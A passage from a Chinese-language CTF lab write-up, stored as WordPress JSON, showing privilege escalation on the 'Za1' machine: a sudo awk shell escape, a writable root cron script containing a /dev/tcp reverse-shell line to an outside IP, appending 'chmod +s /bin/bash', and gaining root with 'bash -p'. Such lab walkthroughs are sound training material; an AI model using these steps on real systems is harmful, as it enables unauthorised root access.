src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240414205823241\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">(remote) www-data@za_1:\/home\/za_1$ sudo -u za_1 awk &#039;BEGIN {system(&quot;\/bin\/bash&quot;)}&#039;\nza_1@za_1:~$ whoami;id\nza_1\nuid=1000(za_1) gid=1000(za_1) groups=1000(za_1),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)\nza_1@za_1:~$ pwd\n\/home\/za_1\nza_1@za_1:~$ ls -la\ntotal 44\ndrwxr-xr-x 6 za_1 za_1 4096 Aug 22  2023 .\ndrwxr-xr-x 3 root root 4096 Jul 26  2023 ..\nlrwxrwxrwx 1 za_1 za_1    9 Aug 22  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 za_1 za_1  220 Apr  4  2018 .bash_logout\n-rw-r--r-- 1 za_1 za_1 3771 Apr  4  2018 .bashrc\ndrwx------ 2 za_1 za_1 4096 Jul 26  2023 .cache\ndrwx------ 3 za_1 za_1 4096 Jul 26  2023 .gnupg\n-rw-r--r-- 1 za_1 za_1  807 Apr  4  2018 .profile\ndrwxr-xr-x 2 za_1 za_1 4096 Jul 26  2023 .root\ndrwx------ 2 za_1 za_1 4096 Jul 26  2023 .ssh\n-rw-r--r-- 1 za_1 za_1    0 Jul 26  2023 .sudo_as_admin_successful\n-rw------- 1 za_1 za_1  991 Jul 26  2023 .viminfo\n-rw-r--r-- 1 za_1 za_1   23 Jul 26  2023 user.txt\nza_1@za_1:~$ cat user.txt\nflag{ThursD0y_v_wo_50}<\/code><\/pre>\n<h3>\u63d0\u6743\u81f3root<\/h3>\n<pre><code class=\"language-bash\">za_1@za_1:~$ sudo -l\n[sudo] password for za_1: \nza_1@za_1:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/bin\/mount\n\/bin\/umount\n\/bin\/fusermount\n\/bin\/su\n\/bin\/ping\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/x86_64-linux-gnu\/lxc\/lxc-user-nic\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/at\n\/usr\/bin\/traceroute6.iputils\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/bin\/pkexec\n\/usr\/bin\/newgidmap\n\/usr\/bin\/chfn\n\/usr\/bin\/newuidmap\n\/usr\/bin\/newgrp\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\nza_1@za_1:~$ file \/bin\/fusermount\n\/bin\/fusermount: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 2.6.32, BuildID[sha1]=3bfc1d4dff4f52bd8df25fd11a2c1b5812e2d71c, stripped\nza_1@za_1:~$ ls -la\ntotal 44\ndrwxr-xr-x 6 za_1 za_1 4096 Aug 22  2023 .\ndrwxr-xr-x 3 root root 4096 Jul 26  2023 ..\nlrwxrwxrwx 1 za_1 za_1    9 Aug 22  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 za_1 za_1  220 Apr  4  2018 .bash_logout\n-rw-r--r-- 1 za_1 za_1 3771 Apr  4  2018 .bashrc\ndrwx------ 2 za_1 za_1 4096 Jul 26  2023 .cache\ndrwx------ 3 za_1 za_1 4096 Jul 26  2023 .gnupg\n-rw-r--r-- 1 za_1 za_1  807 Apr  4  2018 .profile\ndrwxr-xr-x 2 za_1 za_1 4096 Jul 26  2023 .root\ndrwx------ 2 za_1 za_1 4096 Jul 26  2023 .ssh\n-rw-r--r-- 1 za_1 za_1    0 Jul 26  2023 .sudo_as_admin_successful\n-rw------- 1 za_1 za_1  991 Jul 26  2023 .viminfo\n-rw-r--r-- 1 za_1 za_1   23 Jul 26  2023 user.txt\nza_1@za_1:~$ cd .root\nza_1@za_1:~\/.root$ ls -la\ntotal 12\ndrwxr-xr-x 2 za_1 za_1 4096 Jul 26  2023 .\ndrwxr-xr-x 6 za_1 za_1 4096 Aug 22  2023 ..\n-rwxrwxrwx 1 root root  117 Jul 26  2023 back.sh\nza_1@za_1:~\/.root$ cat back.sh \n#!\/bin\/bash\ncp \/var\/www\/html\/usr\/64c0dcaf26f51.db \/var\/www\/html\/sql\/new.sql\nbash -i &gt;&amp;\/dev\/tcp\/10.0.2.18\/999 0&gt;&amp;1\nza_1@za_1:~\/.root$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1113504 Apr 18  2022 \/bin\/bash   \nza_1@za_1:~\/.root$ vim back.sh \nza_1@za_1:~\/.root$ head back.sh \n#!\/bin\/bash\ncp \/var\/www\/html\/usr\/64c0dcaf26f51.db \/var\/www\/html\/sql\/new.sql\nbash -i &gt;&amp;\/dev\/tcp\/10.0.2.18\/999 0&gt;&amp;1\nchmod +s \/bin\/bash<\/code><\/pre>\n<p>\u4e0d\u77e5\u9053\u662f\u5426\u662f\u5b9a\u65f6\u4efb\u52a1\uff0c\u4f46\u662f\u65e2\u7136\u6743\u9650\u8fd9\u4e48\u9ad8\uff0c\u4e14\u6709\u8bfb\u5199\u6743\u9650\uff0c\u5148\u5199\u5165\u518d\u8bf4\uff0c\u4f20\u4e00\u4e2a<code>pspy64<\/code>\u4e0a\u53bb\u7785\u7785\uff1a<\/p>\n<pre><code class=\"language-bash\">(local) pwncat$ lpwd\n\/home\/kali\/temp\/Za_1\n(local) pwncat$ lcd ..\n(local) pwncat$                                                                                                                                         \n(remote) za_1@za_1:\/home\/za_1\/.root$ cd \/tmp\n(remote) za_1@za_1:\/tmp$ \n(local) pwncat$ upload pspy64\n.\/pspy64 \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 4.5\/4.5 MB \u2022 3.6 MB\/s \u2022 0:00:00[09:04:13] uploaded 4.47MiB in 1.71 seconds                                                                                                 upload.py:76\n(local) pwncat$                                                                                                                                         \n(remote) za_1@za_1:\/tmp$ chmod +x pspy64 \n(remote) za_1@za_1:\/tmp$ .\/pspy64 \nSegmentation fault<\/code><\/pre>\n<p>\u6211\u7528\u8fd9\u4e2a\u8f6f\u4ef6\u662f\u56e0\u4e3a\u65b9\u4fbf\uff0c\u5f53\u7136\u4f7f\u7528python\u6216\u8005nc\u4e5f\u53ef\u4ee5\u4f20\u8f93\uff01<\/p>\n<p>\u989d\uff0c\u8fd9\u662f\u4ec0\u4e48\u4e2a\u60c5\u51b5\u3002\u3002\u3002\u6211\u4e5f\u5c1d\u8bd5\u4f20\u4e86\u5c0f\u4e00\u70b9\u7684\u4f46\u8fd8\u662f\u62a5\u9519\u4e86\u3002\u3002\u3002\u3002<\/p>\n<p>\u770b\u4e00\u4e0b\u662f\u5426\u6dfb\u52a0\u4e86<code>suid<\/code>\u6743\u9650\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) za_1@za_1:\/tmp$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1113504 Apr 18  2022 \/bin\/bash\n(remote) za_1@za_1:\/tmp$ bash -p\n(remote) root@za_1:\/tmp# whoami;id\nroot\nuid=1000(za_1) gid=1000(za_1) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),1000(za_1)\n(remote) root@za_1:\/tmp# cd \/root\n(remote) root@za_1:\/root# ls -la\ntotal 60\ndrwx------  6 root root 4096 Aug 22  2023 .\ndrwxr-xr-x 24 root root 4096 Jul 26  2023 ..\nlrwxrwxrwx  1 root root    9 Aug 22  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc\ndrwx------  2 root root 4096 Aug 22  2023 .cache\ndrwx------  3 root root 4096 Aug 22  2023 .gnupg\ndrwxr-xr-x  3 root root 4096 Jul 26  2023 .local\n-rw-------  1 root root  154 Jul 26  2023 .mysql_history\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\n-rw-r--r--  1 root root   75 Jul 26  2023 .selected_editor\n-rw-------  1 root root  137 Aug 22  2023 .sqlite_history\ndrwx------  2 root root 4096 Jul 26  2023 .ssh\n-rw-------  1 root root 9983 Jul 26  2023 .viminfo\n-rw-r--r--  1 root root   25 Jul 26  2023 root.txt\n(remote) root@za_1:\/root# cat root.txt \nflag{qq_group_169232653}<\/code><\/pre>\n<p>\u770b\u6765\u662f\u5b9a\u65f6\u4efb\u52a1\uff0c\u62ff\u5230root\u4e86\u3002\u3002\u3002\u3002\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Za1 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 172.20.10.9 &#8212; -A PORT STATE  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-560","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/560","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=560"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/560\/revisions"}],"predecessor-version":[{"id":561,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/560\/revisions\/561"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=560"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=560"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=560"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}